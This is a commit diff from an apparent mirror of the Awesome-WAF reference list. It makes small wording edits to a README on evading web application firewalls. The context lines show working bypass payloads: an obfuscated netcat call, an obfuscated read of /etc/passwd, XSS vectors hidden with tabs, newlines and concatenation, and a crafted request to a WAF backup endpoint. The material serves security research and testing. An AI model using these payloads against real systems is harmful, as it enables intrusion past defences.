Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2025-02-26 01:11:13 -05:00
Code Issues Packages Projects Releases Wiki Activity

Small perky update to stuff

Browse Source
This commit is contained in:
Infected Drake 2019-06-03 13:18:59 +05:30 committed by GitHub
parent d8e1ddffa5
commit f111d0479c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
README.md
View File

@ -2349,7 +2349,7 @@ __Standard__: `/bin/nc 127.0.0.1 1337`
__Obfuscated__: `/???/n? 2130706433 1337` __Obfuscated__: `/???/n? 2130706433 1337`
Used chars: `/ ? n [0-9]` Used chars: `/ ? n [0-9]`
__9. String Concatenation__ __9. Dynamic Payload Generation__
- Different programming languages have different syntaxes and patterns for concatenation. - Different programming languages have different syntaxes and patterns for concatenation.
- This allows us to effectively generate payloads that can bypass many filters and rules. - This allows us to effectively generate payloads that can bypass many filters and rules.
@ -2363,7 +2363,7 @@ __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>` __Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
__Obfuscated__: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>` __Obfuscated__: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>`
__9. Junk Chars__ __9. Junk Characters__
- Normal payloads get filtered out easily. - Normal payloads get filtered out easily.
- Adding some junk chars helps avoid detection (specific cases only). - Adding some junk chars helps avoid detection (specific cases only).
- They often help in confusing regex based firewalls. - They often help in confusing regex based firewalls.
@ -2382,8 +2382,8 @@ __10. Line Breaks__
- Many WAF with regex based filtering effectively blocks many attempts. - Many WAF with regex based filtering effectively blocks many attempts.
- Line breaks (CR/LF) can break firewall regex and bypass stuff. - Line breaks (CR/LF) can break firewall regex and bypass stuff.
__Standard__: `<iframe src=javascript:alert(0)">` __Standard__: `<iframe src=javascript:confirm(0)">`
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">` __Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">`
__11. Uninitialized Variables__ __11. Uninitialized Variables__
- Uninitialized bash variables can evade bad regular expression based filters and pattern match. - Uninitialized bash variables can evade bad regular expression based filters and pattern match.
@ -2420,7 +2420,7 @@ __Variant__: `<IMG SRC=" jav ascri pt:alert ();">`
__Standard__: `<iframe src=javascript:alert(1)></iframe>` __Standard__: `<iframe src=javascript:alert(1)></iframe>`
__Obfuscated__: __Obfuscated__:
``` ```
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
``` ```
__13. Obfuscation in Other Formats__ __13. Obfuscation in Other Formats__
@ -2694,7 +2694,7 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co
Host: favoritewaf.com Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
``` ```
- XSS Bypass by [0xInfection](https://twitter.com/0xInfection) - XSS Bypass by [@0xInfection](https://twitter.com/0xInfection)
``` ```
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
``` ```